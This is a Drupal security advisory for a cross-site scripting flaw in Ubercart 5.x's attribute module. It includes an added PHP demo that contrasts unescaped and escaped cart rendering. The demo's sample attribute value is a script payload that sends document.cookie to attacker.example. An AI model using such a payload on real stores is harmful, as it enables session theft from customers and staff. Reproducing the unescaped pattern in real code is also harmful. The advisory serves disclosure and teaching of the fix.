  • Advisory ID: DRUPAL-SA-2008-020
  • Project: Ubercart (third-party module)
  • Version: 5.x
  • Date: 2008-March-12
  • Security risk: Less critical
  • Exploitable from: Remote
  • Vulnerability: Cross site scripting

Description

The attribute module lets customers enter a free-text value as an attribute of a product, for example a name to stitch into a hat. When these text values were displayed in the shopping cart or on order pages, the customer-supplied text was not rendered safely as plain text, so a malicious customer could enter HTML or script as the attribute value and perform a cross site scripting attack against anyone viewing the cart or order.
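
To make the defect concrete, the following is an added example and not Ubercart's or Drupal's own code. It reproduces the pattern in a stand-alone PHP script: a customer-supplied attribute text value is concatenated into cart markup (vulnerable) and, alongside it, escaped at output time (fixed). The function names `render_cart_line_vulnerable()`, `render_cart_line_fixed()` and `contains_live_script()`, and the sample attribute values, are constructed for this example; `escape_plain()` is a stand-in for Drupal 5's `check_plain()`, which wraps `htmlspecialchars($text, ENT_QUOTES)`.

```php
<?php
// Added example, not Ubercart code. Runs stand-alone: php example.php

// Constructed sample: a text attribute on a hat, with the value a malicious
// shopper might submit through the product form.
$attribute_label = 'Name to stitch';
$customer_value  = 'Bob<script>document.location="http://attacker.example/?c="'
                 . '+document.cookie</script>';

// Stand-in for Drupal 5's check_plain(): encode &, <, >, " and ' so the
// string is rendered as text and can never be parsed as markup.
function escape_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Vulnerable pattern: the stored value is concatenated straight into the
// cart/order HTML, so any tags inside it become live page content.
function render_cart_line_vulnerable($label, $value) {
    return '<li>' . $label . ': ' . $value . '</li>';
}

// Fixed pattern: every customer-controlled string is escaped at output time.
function render_cart_line_fixed($label, $value) {
    return '<li>' . escape_plain($label) . ': ' . escape_plain($value) . '</li>';
}

// Check used below: does the rendered HTML still contain an unescaped
// <script tag? Escaped output contains "&lt;script" instead.
function contains_live_script($html) {
    return stripos($html, '<script') !== false;
}

$vuln  = render_cart_line_vulnerable($attribute_label, $customer_value);
$fixed = render_cart_line_fixed($attribute_label, $customer_value);

echo "Vulnerable rendering:\n" . $vuln . "\n\n";
echo "Fixed rendering:\n" . $fixed . "\n\n";
echo 'Live <script> in vulnerable output: ' . (contains_live_script($vuln) ? 'yes' : 'no') . "\n";
echo 'Live <script> in fixed output:      ' . (contains_live_script($fixed) ? 'yes' : 'no') . "\n";
```

The example escapes the attribute label as well, even though in a store that value is normally set by the administrator rather than the customer: escaping everything at the point of output, rather than deciding per field who is trusted, is the habit that prevents a single forgotten field from becoming the next advisory.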

All users are encouraged to update to the latest version, but this notice specifically applies to users who have installed the core attribute module and allow customers to enter custom text for attributes on products in their stores.

Versions affected

  • Ubercart for Drupal 5.x prior to 5.x-1.0-beta7

Drupal core is not affected. If you do not use the contributed Ubercart module, there is nothing you need to do.

Solution

Install the latest version, 5.x-1.0-beta7 or later, from the Ubercart project page.

See also the Ubercart project page.

Reported by

j_ten_man reported an issue in the Ubercart forums related to this problem that an Ubercart developer was able to diagnose and fix immediately.

Contact

The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.